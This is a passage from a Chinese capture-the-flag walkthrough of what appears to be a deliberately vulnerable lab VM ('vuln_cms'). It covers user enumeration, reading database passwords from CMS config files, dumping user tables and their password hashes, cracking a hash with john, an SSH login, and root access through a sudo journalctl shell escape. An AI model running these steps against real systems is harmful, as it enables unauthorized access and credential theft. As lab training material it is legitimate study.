/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

在这里插入图片描述

www-data@vuln_cms:~$ find / -user ghost 2>/dev/null
find / -user ghost 2>/dev/null
/home/ghost
/home/ghost/.profile
/home/ghost/.bash_logout
/home/ghost/.sudo_as_admin_successful
/home/ghost/.gnupg
/home/ghost/.local
/home/ghost/.local/share
/home/ghost/.mysql_history
/home/ghost/.cache
/home/ghost/.wget-hsts
/home/ghost/.bashrc
/home/ghost/.bash_history
www-data@vuln_cms:~$ find / -user elliot 2>/dev/null
find / -user elliot 2>/dev/null
/home/elliot
/home/elliot/user.txt
/home/elliot/.gnupg
/home/elliot/.cache
/home/elliot/.bash_history
www-data@vuln_cms:~$ find / -user tyrell 2>/dev/null
find / -user tyrell 2>/dev/null
/home/tyrell
/home/tyrell/.sudo_as_admin_successful
/home/tyrell/.gnupg
/home/tyrell/.cache
/home/tyrell/.bash_history
/var/www
/var/www/html
www-data@vuln_cms:/home$ cd elliot
cd elliot
www-data@vuln_cms:/home/elliot$ ls -al
ls -al
total 24
drwxr-xr-x 4 elliot root 4096 May 31  2021 .
drwxr-xr-x 5 root   root 4096 May 31  2021 ..
-rw------- 1 elliot root   47 May 31  2021 .bash_history
drwx------ 2 elliot root 4096 May 31  2021 .cache
drwx------ 3 elliot root 4096 May 31  2021 .gnupg
-rw-r----- 1 elliot root   17 May 31  2021 user.txt
www-data@vuln_cms:/home$ cd ghost
cd ghost
www-data@vuln_cms:/home/ghost$ ls -al
ls -al
total 44
drwxr-xr-x 5 ghost root  4096 Jun  1  2021 .
drwxr-xr-x 5 root  root  4096 May 31  2021 ..
-rw------- 1 ghost ghost  939 Jun  1  2021 .bash_history
-rw-r--r-- 1 ghost root   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 ghost root  3771 Apr  4  2018 .bashrc
drwx------ 2 ghost root  4096 May 28  2021 .cache
drwx------ 3 ghost root  4096 May 28  2021 .gnupg
drwxrwxr-x 3 ghost root  4096 May 28  2021 .local
-rw------- 1 ghost root  1962 May 29  2021 .mysql_history
-rw-r--r-- 1 ghost root   807 Apr  4  2018 .profile
-rw-r--r-- 1 ghost root     0 May 28  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 ghost root   175 May 28  2021 .wget-hsts
www-data@vuln_cms:/home$ cd tyrell
cd tyrell
www-data@vuln_cms:/home/tyrell$ ls -al
ls -al
total 24
drwxr-xr-x 4 tyrell root   4096 Jun  1  2021 .
drwxr-xr-x 5 root   root   4096 May 31  2021 ..
-rw------- 1 tyrell tyrell  319 Jun  1  2021 .bash_history
drwx------ 2 tyrell tyrell 4096 May 31  2021 .cache
drwx------ 3 tyrell tyrell 4096 May 31  2021 .gnupg
-rw------- 1 root   root     36 Jun  1  2021 .lesshst
-rw-r--r-- 1 tyrell tyrell    0 May 31  2021 .sudo_as_admin_successful

5.3、进程信息收集

  • 有个3306 MySQL进程
www-data@vuln_cms:~$ ss -tulpn
ss -tulpn
Netid  State    Recv-Q   Send-Q      Local Address:Port     Peer Address:Port                                                                                   
udp    UNCONN   0        0           127.0.0.53%lo:53            0.0.0.0:*                                                                                      
udp    UNCONN   0        0                 0.0.0.0:68            0.0.0.0:*                                                                                      
tcp    LISTEN   0        128               0.0.0.0:5000          0.0.0.0:*       users:(("nginx",pid=1362,fd=15),("nginx",pid=1361,fd=15))                      
tcp    LISTEN   0        128               0.0.0.0:9001          0.0.0.0:*       users:(("nginx",pid=1362,fd=12),("nginx",pid=1361,fd=12))                      
tcp    LISTEN   0        80              127.0.0.1:3306          0.0.0.0:*                                                                                      
tcp    LISTEN   0        128               0.0.0.0:80            0.0.0.0:*       users:(("nginx",pid=1362,fd=13),("nginx",pid=1361,fd=13))                      
tcp    LISTEN   0        128               0.0.0.0:8081          0.0.0.0:*       users:(("nginx",pid=1362,fd=14),("nginx",pid=1361,fd=14))                      
tcp    LISTEN   0        128         127.0.0.53%lo:53            0.0.0.0:*                                                                                      
tcp    LISTEN   0        128               0.0.0.0:22            0.0.0.0:*                                                                                      
tcp    LISTEN   0        128                  [::]:22               [::]:*

5.4、查询网站配置文件,找找 MySQL 的信息

  • 此处可以找到用户的SSH登录信息(但是下面也找到了另一个用户的密码,所以这里就忽略了)
tyrell@vuln_cms:~$ find / -name *config* 2>/dev/null | grep "/var/www/html/"
......
/var/www/html/joomla/configuration.php
/var/www/html/wordpress/public_html/wp-config.php
......
tyrell@vuln_cms:~$ cat /var/www/html/joomla/configuration.php
......
        public $host = 'localhost';
        public $user = 'joomla_admin';
        public $password = 'j00m1_@_dBpA$$';
        public $db = 'joomla_db';
......
tyrell@vuln_cms:~$ cat /var/www/html/wordpress/public_html/wp-config.php
......
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_admin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'UUs3R_C!B@p@55' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
......
  • 登录数据库(发现 elliot 用户密码)
www-data@vuln_cms:~$ mysql -u joomla_admin -p
mysql -u joomla_admin -p
Enter password: j00m1_@_dBpA$$
......
MariaDB [(none)]> show databases;
......
MariaDB [(none)]> use joomla_db;
......
MariaDB [joomla_db]> show tables;
......
MariaDB [joomla_db]> select * from hs23w_users;
select * from hs23w_users;
+----+------------+-----------------+-------------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+----------------------------------------------------------------------------------------------+---------------------+------------+--------+------+--------------+
| id | name       | username        | email                   | password                                                     | block | sendEmail | registerDate        | lastvisitDate       | activation | params                                                                                       | lastResetTime       | resetCount | otpKey | otep | requireReset |
+----+------------+-----------------+-------------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+----------------------------------------------------------------------------------------------+---------------------+------------+--------+------+--------------+
| 46 | Super User | joomlaCMS_admin | Fluntence54@armyspy.com | $2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWee |     0 |         1 | 2021-05-29 10:08:24 | 2021-05-31 09:14:41 | 0          |                                                                                              | 0000-00-00 00:00:00 |          0 |        |      |            0 |
| 47 | elliot     | elliot          | 5T3e!_M0un7i@N          | $2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy |     1 |         0 | 2021-05-31 09:16:30 | 0000-00-00 00:00:00 |            | {"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""} | 0000-00-00 00:00:00 |          0 |        |      |            0 |
+----+------------+-----------------+-------------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+----------------------------------------------------------------------------------------------+---------------------+------------+--------+------+--------------+
2 rows in set (0.00 sec)
www-data@vuln_cms:~$ mysql -u wp_admin -p
mysql -u wp_admin -p
Enter password: UUs3R_C!B@p@55
......
MariaDB [(none)]> show databases;
......
MariaDB [(none)]> use wordpress_db;
......
MariaDB [wordpress_db]> show tables;
......
MariaDB [wordpress_db]> select * from wp_users;
select * from wp_users;
+----+-----------------+------------------------------------+-----------------+-------------------------+----------------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login      | user_pass                          | user_nicename   | user_email              | user_url                   | user_registered     | user_activation_key | user_status | display_name    |
+----+-----------------+------------------------------------+-----------------+-------------------------+----------------------------+---------------------+---------------------+-------------+-----------------+
|  1 | wordpress_admin | $P$ByXz8klWHk6kmTctrN/8vfzXGqLfab/ | wordpress_admin | Fluntence54@armyspy.com | http://192.168.29.217:5000 | 2021-05-28 12:50:29 |                     |           0 | wordpress_admin |
+----+-----------------+------------------------------------+-----------------+-------------------------+----------------------------+---------------------+---------------------+-------------+-----------------+
1 row in set (0.00 sec)
  • 闲着无聊,爆破了一些密码(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# echo '$P$ByXz8klWHk6kmTctrN/8vfzXGqLfab/' > hash
                                                                                                                      
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:09:23 DONE (2023-11-19 09:27) 0g/s 25462p/s 25462c/s 25462C/s !!!@@@!!!..*7¡Vamos!
Session completed.

5.5、没啥好利用的信息,进一步信息收集

计划:

  1. 搜索「用户名相关」「备份相关」「关键字相关」
  2. 搜索分类:内容、名称

5.5.1、用户名相关搜索

获取:

  • 用户名称:tyrell : mR_R0bo7_i5_R3@!_
www-data@vuln_cms:~$ grep -r -E 'ghost' *
grep -r -E 'ghost' *
html/drupal/misc/ui/jquery.ui.resizable.min.js:(function(e){e.widget("ui.resizable",e.ui.mouse,{widgetEventPrefix:"resize",options:{alsoResize:false,animate:false,animateDuration:"slow",animateEasing:"swing",aspectRatio:false,autoHide:false,containment:false,ghost:false,grid:false,handles:"e,s,se",helper:false,maxHeight:null,maxWidth:null,minHeight:10,minWidth:10,zIndex:1E3},_create:function(){var b=this,a=this.options;this.element.addClass("ui-resizable");e.extend(this,{_aspectRatio:!!a.aspectRatio,aspectRatio:a.aspectRatio,originalElement:this.element,
html/drupal/misc/ui/jquery.ui.resizable.min.js:_proportionallyResizeElements:[],_helper:a.helper||a.ghost||a.animate?a.helper||"ui-resizable-helper":null});if(this.element[0].nodeName.match(/canvas|textarea|input|select|button|img/i)){/relative/.test(this.element.css("position"))&&e.browser.opera&&this.element.css({position:"relative",top:"auto",left:"auto"});this.element.wrap(e('<div class="ui-wrapper" style="overflow: hidden;"></div>').css({position:this.element.css("position"),width:this.element.outerWidth(),height:this.element.outerHeight(),
......
www-data@vuln_cms:~$ grep -r -E 'elliot' *
grep -r -E 'elliot' *
www-data@vuln_cms:~$ grep -r -E 'tyrell' *
grep -r -E 'tyrell' *
html/drupal/misc/tyrell.pass:Username: tyrell
www-data@vuln_cms:~$ cat html/drupal/misc/tyrell.pass
cat html/drupal/misc/tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_

5.5.2、密码相关搜索

www-data@vuln_cms:~$ grep -ri -E 'password' *
......
html/joomla/configuration.php:  public $password = 'j00m1_@_dBpA$$';
html/joomla/configuration.php:  public $ftp_pass = '';
html/joomla/configuration.php:  public $smtppass = '';
......
html/wordpress/public_html/wp-config.php:define( 'DB_PASSWORD', 'UUs3R_C!B@p@55' );
......

6、SSH 登录

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ssh tyrell@192.168.56.36
The authenticity of host '192.168.56.36 (192.168.56.36)' can`t be established.
ED25519 key fingerprint is SHA256:Yb0sZysuuiVVS7tYhYlJuFB1tpXCVM/99O1M6PYUZoM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.36' (ED25519) to the list of known hosts.
tyrell@192.168.56.36's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-143-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 19 12:25:10 UTC 2023

  System load:  0.0               Processes:             127
  Usage of /:   54.1% of 8.79GB   Users logged in:       0
  Memory usage: 31%               IP address for enp0s3: 192.168.56.36
  Swap usage:   0%

77 packages can be updated.
1 update is a security update.

Last login: Tue Jun  1 04:19:36 2021 from 192.168.1.4
tyrell@vuln_cms:~$

6.1、信息收集

tyrell@vuln_cms:~$ history
    1  clear
    2  ls
    3  clear
    4  pwd
    5  clear
    6  sudo -l
    7  clear
    8  sudo -l
    9  clear
   10  exit
   11  sudo -l
   12  clear
   13  exit
   14  sudo -l
   15  sudo su
   16  sudo 
   17  clear
   18  sudo cd /root
   19  clear
   20  sudo su
   21  ls
   22  ls
   23  clear
   24  sudo su
   25  clear
   26  sudo /usr/bin/journalctl
   27  clear
   28  exit
   29  clear
   30  sudo su
   31  sudo nano
   32  clear
   33  sudo -l
   34  sudo -l
   35  sudo su
   36  clear
   37  sudo -l
   38  /bin/journalctl 
   39  clear
   40  sudo /bin/journalctl 
   41  clear
   42  exit
   43  history
tyrell@vuln_cms:~$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl
tyrell@vuln_cms:~$ ls -al /bin/journalctl
-rwxr-xr-x 1 root root 63576 Apr  7  2021 /bin/journalctl
tyrell@vuln_cms:/bin$ find / -name journalctl 2>/dev/null
/bin/journalctl
/usr/share/bash-completion/completions/journalctl
tyrell@vuln_cms:~$ sudo /bin/journalctl
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Sun 2023-11-19 12:35:42 UTC. --
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-amd64-001) (gcc version 7.5.0 (Ubuntu 7.5.0-3
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv 
May 28 12:16:41 vuln_cms kernel: KERNEL supported cpus:
May 28 12:16:41 vuln_cms kernel:   Intel GenuineIntel
......

7、提权

在这里插入图片描述

tyrell@vuln_cms:~$ sudo /bin/journalctl
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Sun 2023-11-19 13:28:52 UTC. --
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-amd64-001) (gcc version 7.5.0 (Ubuntu 
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-generic root=/dev/mapper/ubuntu--vg-ubun
May 28 12:16:41 vuln_cms kernel: KERNEL supported cpus:
......
May 28 12:16:41 vuln_cms kernel: SMBIOS 2.5 present.
May 28 12:16:41 vuln_cms kernel: DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
!/bin/sh
# SHELL=/bin/bash script -q /dev/null
root@vuln_cms:~# cd /root
root@vuln_cms:/root# ls
root.txt
root@vuln_cms:/root# cat root.txt
4359537020406305

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1315468.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

有这么多木材类型,为什么偏要使用橡木来制作发酵桶呢?

纵观历史&#xff0c;制作发酵桶有很多木材类型&#xff0c;包括栗子、松木、红木和金合欢&#xff0c;被用于制作酿酒容器&#xff0c;特别是大型发酵桶。栗子单宁含量很高&#xff0c;作为储物桶太多孔&#xff0c;必须涂上石蜡&#xff0c;以防止因蒸发而过度失去葡萄酒。红…

connect: Network is unreachable问题解决

第一步&#xff1a;查看ifcfg-ens33配置文件 cd /etc/sysconfig/network-scripts/ cat ifcfg-ens33 发现问题&#xff1a;GATEWAY写错成GATWAY 第二步&#xff1a;修改 vim ifcfg-ens33 第三步&#xff1a;检测是否成功 ping baidu.com 成功&#xff01;

数据分析基础之《numpy(3)—基本操作》

一、基本操作 1、adarray.方法() 2、np.函数名() 二、生成数组的方法 1、生成0和1的数组 为什么需要生成0和1的数组&#xff1f; 我们需要占用位置&#xff0c;或者生成一个空的数组 &#xff08;1&#xff09;ones(shape[, dtype, order]) 生成一组1 shape&#xff1a;形…

算法:二叉树的遍历

一、31种遍历方法 (1)先序法&#xff08;又称先根法&#xff09; 先序遍历&#xff1a;根&#xff0c;左子树&#xff0c;右子树 遍历的结果&#xff1a;A&#xff0c;B&#xff0c;C 遍历的足迹&#xff1a;沿途经过各结点的“左部” (2)中序法&#xff08;又称中根法&#…

基于Java的教学信息反馈系统设计与实现(源码+调试)

项目描述 临近学期结束&#xff0c;还是毕业设计&#xff0c;你还在做java程序网络编程&#xff0c;期末作业&#xff0c;老师的作业要求觉得大了吗?不知道毕业设计该怎么办?网页功能的数量是否太多?没有合适的类型或系统?等等。今天给大家介绍一篇基于Java的教学信息反馈…

ffmpeg可以做什么

用途 FFmpeg是一个功能强大的多媒体处理工具&#xff0c;可以处理音频和视频文件。它是一个开源项目&#xff0c;可在各种操作系统上运行&#xff0c;包括Linux、Windows和Mac OS X等。以下是FFmpeg可以做的一些主要任务&#xff1a; 转换媒体格式&#xff1a;可将一个媒体格式…

大创项目推荐 深度学习 python opencv 动物识别与检测

文章目录 0 前言1 深度学习实现动物识别与检测2 卷积神经网络2.1卷积层2.2 池化层2.3 激活函数2.4 全连接层2.5 使用tensorflow中keras模块实现卷积神经网络 3 YOLOV53.1 网络架构图3.2 输入端3.3 基准网络3.4 Neck网络3.5 Head输出层 4 数据集准备4.1 数据标注简介4.2 数据保存…

QT实现四则运算计算器

#include "widget.h" #include "ui_widget.h"Widget::Widget(QWidget *parent): QWidget(parent), ui(new Ui::Widget) {ui->setupUi(this);this->setMaximumSize(240,300);this->setMinimumSize(240,300);this->setWindowTitle("计算器&…

案例精选|聚铭综合日志分析系统助力长房集团“智慧房产”信息化建设

长沙房产&#xff08;集团&#xff09;有限公司&#xff08;简称“长房集团”&#xff09;始创于2004年3月&#xff0c;是一家由长沙市人民政府授权组建的国有独资企业。截至2021年底&#xff0c;企业总资产逾452亿元&#xff0c;总开发面积1300多万平方米&#xff0c;已开发项…

msvcrtd.dll下载安装方法,解决msvcrtd.dll找不到的问题

在这篇文章中&#xff0c;我们将详细讨论msvcrtd.dll文件的下载安装方法&#xff0c;并分析出现找不到msvcrtd.dll的情况及解决方法。如果你遇到了与msvcrtd.dll相关的问题&#xff0c;本文将为你提供全面且详细的解决方案。 一.什么是msvcrtd.dll文件 首先&#xff0c;让我们…

openmediavault debian linux安装配置企业私有网盘(三 )——raid5与btrfs文件系统无损原数据扩容

一、适用环境 1、企业自有物理专业服务器&#xff0c;一些敏感数据不外流时&#xff0c;使用openmediavault自建NAS系统&#xff1b; 2、在虚拟化环境中自建NAS系统&#xff0c;用于内网办公&#xff0c;或出差外网办公时&#xff0c;企业内的文件共享&#xff1b; 3、虚拟化环…

电子电工企业品牌网站建设的作用是什么

电子电工企业在市场中有较高的需求度&#xff0c;比如电子元件、电子产品等&#xff0c;这些都属于高信任度产品&#xff0c;对需求方来说&#xff0c;需要查看商家全部信息、包括资质、产品/服务内容、案例等&#xff0c;因此对电子电工企业来讲&#xff0c;需要贯通品牌路径&…

遥感论文 | Scientific Reports | 一种显著提升遥感影像小目标检测的网络!

论文题目&#xff1a;MwdpNet: towards improving the recognition accuracy of tiny targets in high-resolution remote sensing image论文网址&#xff1a;https://www.nature.com/articles/s41598-023-41021-8 摘要 提出MwdpNet&#xff0c;以提高对高分辨率遥感&#xf…

MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)

0x01 产品简介 MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。 0x02 漏洞概述 MeterSphere /api/jmeter/download/files 路径文件存在文件读取漏洞,攻击者可通过该漏洞读取系统重要…

一点技术细节

匈牙利算法&#xff1a; 14-4: 匈牙利算法 Hungarian Algorithm_哔哩哔哩_bilibili 课件&#xff1a;https://github.com/wangshusen/AdvancedAlgorithms.git SWin transformer&#xff1a; Swin Transformer论文精读【论文精读】_哔哩哔哩_bilibili patch:灰色 窗口&…

c语言单向链表

看如下代码&#xff0c;这是一个完整的可运行的c源文件&#xff0c;要注意的点&#xff1a; c语言程序运行不一定需要头文件NULL其实是 (void*)0&#xff0c;把指针赋值成(void*)0,就是防止程序员不想该指针被引用的时候被引用&#xff0c;引用地址为0的值程序会引起系统中断&…

JNA实现JAVA调用C/C++动态库

1.JNA JNA全称Java Native Access&#xff0c;是一个建立在经典的JNI技术之上的Java开源框架&#xff08;https://github.com/twall/jna&#xff09;。JNA提供一组Java工具类用于在运行期动态访问系统本地库&#xff08;native library&#xff1a;如Window的dll&#xff09;而…

【C++11特性篇】盘点C++11中三种简化声明的方式【auto】【decltype】【nullptr】(3)

前言 大家好吖&#xff0c;欢迎来到 YY 滴C系列 &#xff0c;热烈欢迎&#xff01; 本章主要内容面向接触过C的老铁 主要内容含&#xff1a; 欢迎订阅 YY滴C专栏&#xff01;更多干货持续更新&#xff01;以下是传送门&#xff01; 目录 一.auto&#xff06;范围for二.decltyp…

flume:Ncat: Connection refused.

一&#xff1a;nc -lk 44444 和 nc localhost 44444区别 nc -lk 44444 和 nc localhost 44444 是使用 nc 命令进行网络通信时的两种不同方式。 1. nc -lk 44444&#xff1a; - 这个命令表示在本地监听指定端口&#xff08;44444&#xff09;并接受传入的连接。 - -l 选项…

使用Redis构建简单的社交网站

文章目录 第1关&#xff1a;创建用户与动态第2关&#xff1a;处理用户关系第3关&#xff1a;状态与信息流 第1关&#xff1a;创建用户与动态 编程要求 在Begin-End区域编写 create_user(login_name, real_name) 函数&#xff0c;实现创建新用户的功能&#xff0c;具体参数与要…